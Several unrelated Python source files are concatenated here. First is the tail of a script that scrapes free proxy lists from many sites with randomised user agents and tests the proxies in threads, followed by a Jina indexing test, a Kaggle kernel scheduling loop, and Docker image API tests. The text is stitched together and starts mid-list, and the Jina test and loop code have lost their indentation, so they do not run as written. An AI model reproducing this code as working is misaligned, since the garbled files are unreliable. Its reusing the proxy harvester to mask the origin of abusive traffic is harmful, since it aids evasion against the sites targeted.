"Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1",
"nook browser/1.0",
"Offline Explorer/2.5",
"Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30",
"Opera/7.50 (Windows ME; U) [en]",
"Opera/7.50 (Windows XP; U)",
"Opera/7.51 (Windows NT 5.1; U) [en]",
"Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)",
"Opera/9.0 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.20 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Windows NT 6.0; U; en)",
"Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)",
"Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)",
"Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0",
"Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1",
"Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00",
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00",
"Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10",
"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
"P3P Validator",
"Peach/1.01 (Ubuntu 8.04 LTS; U; en)",
"POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1",
"POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1",
"portalmmm/2.0 N410i(c20;TB) ",
"Python-urllib/2.5",
"SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3",
"SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"SearchExpress",
"SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr)",
"SEC-SGHX210/1.0 UP.Link/6.3.1.13.0",
"SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT100/R101",
"SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0",
"SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT68/R201A",
"SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US]",
"SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0",
"SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SuperBot/4.4.0.60 (Windows XP)",
"Uzbl (Webkit 1.3) (Linux i686 [i686])",
"Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1",
"W3C_Validator/1.305.2.12 libwww-perl/5.64",
"W3C_Validator/1.654",
"w3m/0.5.1",
"WDG_Validator/1.6.2",
"WebCopier v4.6",
"Web Downloader/6.9",
"WebZIP/3.5 (http://www.spidersoft.com)",
"Wget/1.9.1",
"Wget/1.9 cvs-stable (Red Hat modified)",
"wii libnup/1.0",
]
# assorted proxy-list mirrors to scrape
nurls = ["http://www.aliveproxy.com/high-anonymity-proxy-list/", "http://www.aliveproxy.com/anonymous-proxy-list/",
"http://www.aliveproxy.com/fastest-proxies/", "http://www.aliveproxy.com/us-proxy-list/", "http://www.aliveproxy.com/gb-proxy-list/",
"http://www.aliveproxy.com/fr-proxy-list/", "http://www.aliveproxy.com/de-proxy-list/", "http://www.aliveproxy.com/jp-proxy-list/",
"http://www.aliveproxy.com/ca-proxy-list/", "http://www.aliveproxy.com/ru-proxy-list/", "http://www.aliveproxy.com/proxy-list-port-80/",
"http://www.aliveproxy.com/proxy-list-port-81/", "http://www.aliveproxy.com/proxy-list-port-3128/", "http://www.aliveproxy.com/proxy-list-port-8000/",
"http://www.aliveproxy.com/proxy-list-port-8080/", "http://webanetlabs.net/publ/24", "http://www.proxz.com/proxy_list_high_anonymous_0.html",
"http://www.proxz.com/proxy_list_anonymous_us_0.html", "http://www.proxz.com/proxy_list_uk_0.html", "http://www.proxz.com/proxy_list_ca_0.html",
"http://www.proxz.com/proxy_list_cn_ssl_0.html", "http://www.proxz.com/proxy_list_jp_0.html", "http://www.proxz.com/proxy_list_fr_0.html",
"http://www.proxz.com/proxy_list_port_std_0.html", "http://www.proxz.com/proxy_list_port_nonstd_0.html", "http://www.proxz.com/proxy_list_transparent_0.html",
"http://www.proxylists.net/", "https://www.my-proxy.com/free-proxy-list.html","https://www.my-proxy.com/free-elite-proxy.html",
"https://www.my-proxy.com/free-anonymous-proxy.html", "https://www.my-proxy.com/free-transparent-proxy.html","https://jffjdjkbfek.000webhostapp.com/proxy.txt"]
def proxyget(url):  # download proxies from the mirror sites listed in nurls
    try:
        req = urllib.request.Request(url)  # url is one of the mirrors defined above
        req.add_header("User-Agent", random.choice(useragents))  # pick a random user agent from the list above
        sourcecode = urllib.request.urlopen(req, timeout=10)  # fetch the page source with a 10 second timeout
        for line in sourcecode:
            # look for ip:port pairs in the current line
            ip = re.findall(r"(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
            ipf = [x for x in ip if not x.startswith("0.")]  # drop obviously useless addresses
            if ipf:  # only touch the file if something was found
                with open("proxy.txt", "a") as out_file:
                    for x in ipf:
                        out_file.write(x + "\n")  # append the proxies one per line to proxy.txt
    except Exception:
        print("\nAn error occurred, skipping to the next website.")
def proxyget2(url):  # as the name says, this function also downloads proxies
    # free-proxy-list.net and its sister sites (us-proxy.org, socks-proxy.net) share
    # the same table layout, so the same parsing below works for all of them.
    try:
        req = urllib.request.Request(url)
        req.add_header("User-Agent", random.choice(useragents))  # random user agent from the list above
        sourcecode = urllib.request.urlopen(req, timeout=10)
        part = str(sourcecode.read())
        part = part.split("<tbody>")
        part = part[1].split("</tbody>")
        part = part[0].split("<tr><td>")
        proxies = ""
        for proxy in part:
            proxy = proxy.split("</td><td>")
            try:
                proxies = proxies + proxy[0] + ":" + proxy[1] + "\n"  # the first two cells are ip and port
            except IndexError:
                pass  # rows without at least two cells are skipped
        out_file = open("proxy.txt", "a")
        out_file.write(proxies)
        out_file.close()
    except Exception:  # if anything goes wrong with the download or the parsing
        print("\nAn error occurred, skipping to the next website.")
def blogspotget(url, word, word2):  # this function also downloads proxies, but from the blogspot sites
    try:
        soup = BeautifulSoup(urllib.request.urlopen(url))
        for tag in soup.find_all(word2, word):  # after parsing the page, bs4 locates the posts holding the proxy lists
            links = tag.a.get("href")  # grab the link of each proxy-list post
            result = urllib.request.urlopen(links)  # and finally open it
            for line in result:
                # look for ip:port pairs in the page
                ip = re.findall(r"(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
                if ip:  # proceed only if something was found
                    with open("proxy.txt", "a") as out_file:
                        for x in ip:
                            out_file.write(x + "\n")  # append the proxies one per line to proxy.txt
    except Exception:
        print("\nAn error occurred, skipping to the next website.")
def proxylist():  # tidy up the downloaded proxy list
    global proxies
    print("\nChecking for duplicates...")
    proxies = open("proxy.txt").readlines()  # the txt file contains duplicates, so:
    proxiesp = []
    for i in proxies:
        if i not in proxiesp:  # if the proxy is not already in proxiesp
            proxiesp.append(i)  # add it, preserving the original order
    filepr = open("proxy.txt", "w")  # first wipe the file
    filepr.close()
    filepr = open("proxy.txt", "a")  # then reopen it in append mode so the kept proxies are not overwritten
    for i in proxiesp:
        filepr.write(i)
    filepr.close()  # close (and flush) before counting the lines below
    print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
    print("\nProxylist Updated!\n")
def proxycheckerinit():
    global out_file
    candidate_proxies = open("proxy.txt").readlines()
    filedl = open("proxy.txt", "w")  # first wipe the file
    filedl.close()
    out_file = open("proxy.txt", "a")  # then reopen it in append mode; working proxies are written back here
    for i in candidate_proxies:
        threading.Thread(target=proxychecker, args=[i]).start()  # one thread per proxy to speed things up
def proxychecker(i):
    proxy = 'http://' + i.strip()  # strip the trailing newline read from the file
    proxy_support = urllib.request.ProxyHandler({'http': proxy})  # route the request through the proxy
    opener = urllib.request.build_opener(proxy_support)
    urllib.request.install_opener(opener)  # note: the installed opener is process-wide, so concurrent threads overwrite it
    try:
        urllib.request.urlopen("http://www.google.com", timeout=10)
        print("%s works!\n\n" % proxy)  # if the request goes through, report the proxy as working
        out_file.write(i)  # and write it back to the file
    except Exception:
        print("%s does not respond.\n\n" % proxy)  # otherwise report that it does not respond
def main():  # the actual body of the program
    try:
        out_file = open("proxy.txt", "w")  # first of all wipe the contents of proxy.txt
        out_file.close()
        print("\nDownloading from free-proxy-list in progress...")
        url = "http://free-proxy-list.net/"
        proxyget2(url)  # hand the url to the table parser
        url = "https://www.us-proxy.org/"
        proxyget2(url)
        print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))  # print the current length of the file, i.e. the number of proxies
        print("\nDownloading from blogspot in progress...\n")
        url = "http://www.proxyserverlist24.top/"
        word = "post-title entry-title"
        word2 = "h3"
        blogspotget(url, word, word2)  # pass the url plus the tag name and class to look for
        url = "https://proxylistdaily4you.blogspot.com/"
        word = "post-body entry-content"
        word2 = "div"
        blogspotget(url, word, word2)
        print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
        print("\nDownloading from various mirrors in progress...")
        for position, url in enumerate(nurls):
            proxyget(url)
            print("Completed downloads: (%s/%s)\nCurrent IPs in proxylist: %s" % (position + 1, len(nurls), len(open("proxy.txt").readlines())))
        print("\nDownloading from foxtools in progress...")
        foxtools = ['http://api.foxtools.ru/v2/Proxy.txt?page=%d' % n for n in range(1, 6)]  # grab the IPs from foxtools pages 1 to 5
        for position, url in enumerate(foxtools):
            proxyget(url)
        print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
        proxylist()  # then tidy up the list (remove duplicates)
        print("\n")
        while True:
            choice = input("\nDo you want to check the proxies? [Y/n] > ")
            if choice in ('Y', 'y', 'yes', 'Yes'):
                proxycheckerinit()
                break
            elif choice in ('N', 'n', 'no', 'No'):
                exit(0)
            else:
                print("Please answer with Y or N.")
    except Exception:
        print("\n\nAn error occurred.")
if __name__ == '__main__':
    while True:
        choice = input("\nDo you want to download proxies? [Y/n] > ")
        if choice in ('Y', 'y', 'yes', 'Yes'):  # download fresh proxies, then hand over to main()
            main()
            break
        elif choice in ('N', 'n', 'no', 'No'):  # otherwise only check the proxies already in the file
            proxycheckerinit()
            break
        else:  # on any other input, ask again
            print("Please answer with Y or N.")
|
test_index_remote.py
|
import multiprocessing as mp
import os
import time
import unittest
import numpy as np
from jina.drivers.helper import array2pb
from jina.enums import FlowOptimizeLevel
from jina.executors.indexers.vector.numpy import NumpyIndexer
from jina.flow import Flow
from jina.main.parser import set_gateway_parser
from jina.peapods.pod import GatewayPod
from jina.proto import jina_pb2
from tests import JinaTestCase
def random_docs(num_docs, chunks_per_doc=5, embed_dim=10):
c_id = 0
for j in range(num_docs):
d = jina_pb2.Document()
for k in range(chunks_per_doc):
c = d.chunks.add()
c.embedding.CopyFrom(array2pb(np.random.random([embed_dim])))
c.chunk_id = c_id
c.doc_id = j
c_id += 1
yield d
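# Hedged usage sketch, not part of the original tests: materialise a couple of the
# generated documents to check their chunk layout; the helper name is made up.
def _peek_random_docs():
    docs = list(random_docs(2, chunks_per_doc=3, embed_dim=4))
    return [len(d.chunks) for d in docs]  # expected: [3, 3]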
def get_result(resp):
n = []
for d in resp.search.docs:
for c in d.chunks:
n.append([k.match_chunk.chunk_id for k in c.topk_results])
n = np.array(n)
# each chunk should return a list of top-100
np.testing.assert_equal(n.shape[0], 5)
np.testing.assert_equal(n.shape[1], 100)
class DummyIndexer(NumpyIndexer):
    # add() is overridden as a no-op, so this indexer never actually writes any vectors
def add(self, *args, **kwargs):
pass
class DummyIndexer2(NumpyIndexer):
# the add() function is simply copied from NumpyIndexer
def add(self, keys: 'np.ndarray', vectors: 'np.ndarray', *args, **kwargs):
if len(vectors.shape) != 2:
raise ValueError('vectors shape %s is not valid, expecting "vectors" to have rank of 2' % vectors.shape)
if not self.num_dim:
self.num_dim = vectors.shape[1]
self.dtype = vectors.dtype.name
elif self.num_dim != vectors.shape[1]:
raise ValueError(
"vectors' shape [%d, %d] does not match with indexers's dim: %d" %
(vectors.shape[0], vectors.shape[1], self.num_dim))
elif self.dtype != vectors.dtype.name:
raise TypeError(
"vectors' dtype %s does not match with indexers's dtype: %s" %
(vectors.dtype.name, self.dtype))
elif keys.shape[0] != vectors.shape[0]:
raise ValueError('number of key %d not equal to number of vectors %d' % (keys.shape[0], vectors.shape[0]))
elif self.key_dtype != keys.dtype.name:
raise TypeError(
"keys' dtype %s does not match with indexers keys's dtype: %s" %
(keys.dtype.name, self.key_dtype))
self.write_handler.write(vectors.tobytes())
self.key_bytes += keys.tobytes()
self.key_dtype = keys.dtype.name
self._size += keys.shape[0]
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
class MyTestCase(JinaTestCase):
def tearDown(self) -> None:
super().tearDown()
time.sleep(2)
def test_index_remote(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
def start_gateway():
with GatewayPod(f_args):
time.sleep(20)
t = mp.Process(target=start_gateway)
t.daemon = True
t.start()
f = Flow().add(yaml_path='yaml/test-index.yml',
replicas=3, separated_workspace=True,
host='localhost', port_grpc=f_args.port_grpc)
with f:
f.index(raw_bytes=random_docs(1000), in_proto=True)
time.sleep(3)
for j in range(3):
self.assertTrue(os.path.exists(f'test2-{j + 1}/test2.bin'))
self.assertTrue(os.path.exists(f'test2-{j + 1}/tmp2'))
self.add_tmpfile(f'test2-{j + 1}/test2.bin', f'test2-{j + 1}/tmp2', f'test2-{j + 1}')
def test_index_remote_rpi(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
def start_gateway():
with GatewayPod(f_args):
time.sleep(50)
t = mp.Process(target=start_gateway)
t.daemon = True
t.start()
f = (Flow(optimize_level=FlowOptimizeLevel.IGNORE_GATEWAY)
.add(yaml_path='yaml/test-index.yml',
replicas=3, separated_workspace=True,
host='192.168.31.76', port_grpc=44444))
with f:
f.index(raw_bytes=random_docs(1000), in_proto=True)
if __name__ == '__main__':
unittest.main()
|
loop.py
|
import time
from musket_core.kaggle_train_runner.kernel import Project, Kernel, KERNEL_STATUS_UNKNOWN, KERNEL_STATUS_CANCELED, KERNEL_STATUS_COMPLETE, KERNEL_STATUS_ERROR, KERNEL_STATUS_NOINTERNET, KERNEL_STATUS_RUNNING
from musket_core.kaggle_train_runner import connection
import threading
from async_promises import Promise
class Task:
    def __init__(self, task, sleep=0, on_complete=None):  # sleep: seconds to wait before the task may run
self.task = task
self.on_complete = on_complete
self.time_to_run = time.time() + sleep
def run(self):
def rejection(cause):
print(cause)
Promise(lambda resolve, reject: resolve(self.task() or True)).then(lambda success: self.on_complete() or True if self.on_complete else True, rejection)
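# Hedged usage sketch, not part of the original module: a Task simply wraps a callable,
# remembers the earliest wall-clock time it may run, and optionally fires a callback
# when the work resolves. The example below uses made-up lambdas for illustration.
def _example_task():
    return Task(lambda: print("doing work"), sleep=5, on_complete=lambda: print("done"))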
def kernel_status_request_task(kernel: Kernel, on_complete, wait=300, after_run=False):
status = [KERNEL_STATUS_NOINTERNET]
def complete():
on_complete(kernel, status[0])
print("kernel_status_request_task complete")
def task():
while True:
status[0] = kernel.get_status(after_run)
if status[0] != KERNEL_STATUS_NOINTERNET:
break
else:
print(status[0])
time.sleep(1)
print("shedule kernel_status_request_task...")
return Task(task, wait, complete)
def kernel_run_request_task(kernel: Kernel, on_complete, wait=300):
def task():
result = kernel.push()
if len(result) > 0:
print(result);
if("Maximum batch GPU session count") in result:
print("retry will be started after " + str(wait) + " seconds")
time.sleep(wait)
task()
print("shedule kernel_run_request_task...")
def complete(k):
on_complete(k)
print("kernel_run_request_task complete")
return Task(task, wait, lambda: complete(kernel))
class MainLoop:
def __init__(self, project: Project):
self.project = project
self.queue = []
self.running = 0
self.wait = self.project.meta["requests_delay"]
self.kernels_queue = None
def add_task(self, task):
self.queue.insert(0, task)
def run_server(self):
def do_run_server():
connection.run_server(self.project)
threading.Thread(target=do_run_server).start()
def shutdown(self):
self.project.server.shutdown()
self.project.server.server_close()
for item in self.project.kernels:
item.assemble()
def start(self):
self.run_server()
self.kernels_queue = list(self.project.kernels)
self.add_kernels()
while True:
if len(self.queue) > 0:
task = self.queue.pop()
if time.time() > task.time_to_run:
task.run()
else:
self.add_task(task)
elif self.running == 0:
self.shutdown()
break
time.sleep(1)
def add_kernels(self):
while len(self.kernels_queue) and self.running < self.project.meta["kernels"]:
self.running += 1
self.add_task(kernel_status_request_task(self.kernels_queue.pop(), self.on_kernel_status, 10));
def run_kernel(self, kernel, wait_after_run, wait_after_status, is_initial):
kernel.archive(is_initial)
self.add_task(kernel_run_request_task(kernel, lambda k: self.add_task(kernel_status_request_task(k, self.on_kernel_status, wait_after_status)), wait_after_run))
def on_kernel_status(self, kernel, status):
print("status: " + status)
if status == KERNEL_STATUS_UNKNOWN:
self.run_kernel(kernel, 10, 20, True)
return
if status == KERNEL_STATUS_COMPLETE or status == KERNEL_STATUS_ERROR:
kernel.download()
if kernel.is_complete():
self.running -= 1
self.add_kernels()
else:
self.run_kernel(kernel, self.wait, self.wait, False)
return
if status == KERNEL_STATUS_RUNNING:
self.add_task(kernel_status_request_task(kernel, self.on_kernel_status))
return
|
api_image_test.py
|
import contextlib
import json
import shutil
import socket
import tarfile
import tempfile
import threading
import pytest
from http.server import SimpleHTTPRequestHandler
import socketserver
import docker
from ..helpers import requires_api_version, requires_experimental
from .base import BaseAPIIntegrationTest, TEST_IMG
class ListImagesTest(BaseAPIIntegrationTest):
def test_images(self):
res1 = self.client.images(all=True)
assert 'Id' in res1[0]
res10 = res1[0]
assert 'Created' in res10
assert 'RepoTags' in res10
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
assert len(distinct) == self.client.info()['Images']
def test_images_quiet(self):
res1 = self.client.images(quiet=True)
assert type(res1[0]) == str
class PullImageTest(BaseAPIIntegrationTest):
def test_pull(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world')
self.tmp_imgs.append('hello-world')
assert type(res) == str
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
def test_pull_streaming(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull(
'hello-world', stream=True, decode=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
assert isinstance(chunk, dict)
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
@requires_api_version('1.32')
@requires_experimental(until=None)
def test_pull_invalid_platform(self):
with pytest.raises(docker.errors.APIError) as excinfo:
self.client.pull('hello-world', platform='foobar')
            # Some API versions incorrectly return a 500 status; assert 4xx or 5xx
assert excinfo.value.is_error()
assert 'unknown operating system' in excinfo.exconly() \
or 'invalid platform' in excinfo.exconly()
class CommitTest(BaseAPIIntegrationTest):
def test_commit(self):
container = self.client.create_container(TEST_IMG, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(id)
assert 'ContainerConfig' in img
assert 'Image' in img['ContainerConfig']
assert TEST_IMG == img['ContainerConfig']['Image']
busybox_id = self.client.inspect_image(TEST_IMG)['Id']
assert 'Parent' in img
assert img['Parent'] == busybox_id
def test_commit_with_changes(self):
cid = self.client.create_container(TEST_IMG, ['touch', '/test'])
self.tmp_containers.append(cid)
self.client.start(cid)
img_id = self.client.commit(
cid, changes=['EXPOSE 8000', 'CMD ["bash"]']
)
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(cid['Id'])
assert '8000/tcp' in img['Config']['ExposedPorts']
assert img['Config']['Cmd'] == ['bash']
class RemoveImageTest(BaseAPIIntegrationTest):
def test_remove(self):
container = self.client.create_container(TEST_IMG, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
logs = self.client.remove_image(img_id, force=True)
assert {"Deleted": img_id} in logs
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
assert len(res) == 0
class ImportImageTest(BaseAPIIntegrationTest):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile(delete=False) as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
def test_import_from_bytes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_file(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_stream(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_image_from_data_with_changes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
def test_import_image_with_changes(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
statuses = self.client.import_image(
src=tar_filename, repository='test/import-from-file',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
# Docs say output is available in 1.23, but this test fails on 1.12.0
@requires_api_version('1.24')
def test_get_load_image(self):
test_img = 'hello-world:latest'
self.client.pull(test_img)
data = self.client.get_image(test_img)
assert data
output = self.client.load_image(data)
assert any([
line for line in output
if f'Loaded image: {test_img}' in line.get('stream', '')
])
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
thread.start()
yield f'http://{socket.gethostname()}:{server.server_address[1]}'
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def test_import_from_url(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
tar_size = 10240
with self.dummy_tar_stream(n_bytes=tar_size) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
@requires_api_version('1.25')
class PruneImagesTest(BaseAPIIntegrationTest):
def test_prune_images(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
# Ensure busybox does not get pruned
ctnr = self.client.create_container(TEST_IMG, ['sleep', '9999'])
self.tmp_containers.append(ctnr)
self.client.pull('hello-world', tag='latest')
self.tmp_imgs.append('hello-world')
img_id = self.client.inspect_image('hello-world')['Id']
result = self.client.prune_images()
assert img_id not in [
img.get('Deleted') for img in result.get('ImagesDeleted') or []
]
result = self.client.prune_images({'dangling': False})
